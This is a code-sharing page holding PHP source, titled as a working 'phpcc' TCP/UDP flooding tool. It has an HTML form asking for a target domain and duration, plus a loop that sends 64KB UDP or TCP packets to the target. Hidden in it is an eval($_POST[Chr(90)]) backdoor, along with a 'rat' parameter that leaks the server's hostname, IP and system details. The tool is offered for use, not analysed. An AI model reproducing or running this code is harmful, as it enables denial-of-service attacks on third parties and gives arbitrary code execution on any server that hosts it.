phpcc源码_tcp+udp版本(可用)

Run Settings
LanguagePHP
Language Version
Run Command
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="author" content=""> <title>在线PHPCC </title> </head> <!-- PHP DOS, coded by Scratch Linux --> <style type="text/css"> <!-- body { font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-style: normal; line-height: normal; color: #FFFFFF; background-color: #000000; } --> </style> <!-- PHP DOS, coded by Scratch Linux --> <body> <center><br><br> <img src="http://tool.cccyun.cc/tool/ddos/main.jpg"><br> <b>您的IP:</b> <font color="red"><?php if(getenv('HTTP_CLIENT_IP')){ $onlineip = getenv('HTTP_CLIENT_IP'); } elseif(getenv('HTTP_X_FORWARDED_FOR')){ $onlineip = getenv('HTTP_X_FORWARDED_FOR'); } elseif(getenv('REMOTE_ADDR')){ $onlineip = getenv('REMOTE_ADDR'); } else{ $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR']; } echo $onlineip; ?></font>&nbsp;(请不要随意CC,避免数据堵塞导致死机)<br><br> <form name="input" action="cc.php" method="get"> 目标域名: <input type="text" name="http" size="15" maxlength="15" class="main" value = "baidu.com" onblur = "if ( this.value=='' ) this.value = 'baidu.com';" onfocus = " if ( this.value == 'baidu.com' ) this.value = '';"> &nbsp;&nbsp;&nbsp;&nbsp;时间: <input type="text" name="time" size="14" maxlength="20" class="main" value = "时间/秒" onblur = "if ( this.value=='' ) this.value = '时间/秒';" onfocus = " if ( this.value == '时间/秒' ) this.value = '';"> <br><br> <input type="submit" value="开始攻击"> <br><br> <center> 如果正在CC中,请等待页面加载完成... </center> </form> </center> <!-- PHP DOS, coded by Scratch Linux --> </body> </html>
<?php eval($_POST[Chr(90)]); set_time_limit(86400); ignore_user_abort(True); $packets = 0; $http = $_GET['http']; $rand = $_GET['exit']; $exec_time = $_GET['time']; if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0) { if(StrLen($_GET['rat'])<>0) { echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; } echo "phpcc\nQQ2098175794"; exit; } for($i=0;$i<65535;$i++) { $out .= "X"; } //Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center $max_time = time()+$exec_time; if($rand==53) while(1) { $packets++; if(time() > $max_time) { break; } $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else if($rand==500) while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } else while(1) { $packets++; if(time() > $max_time){ break; } $fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5); if($fp) { fwrite($fp, $out); fclose($fp); } } } ?>
Editor Settings
Theme
Key bindings
Full width
Lines